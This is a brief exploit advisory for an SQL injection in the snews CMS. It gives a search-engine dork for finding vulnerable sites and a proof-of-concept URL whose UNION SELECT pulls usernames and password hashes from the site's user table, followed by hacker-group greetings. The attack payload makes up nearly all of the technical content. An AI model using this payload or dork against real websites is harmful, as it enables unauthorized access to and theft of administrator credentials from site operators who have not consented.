Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*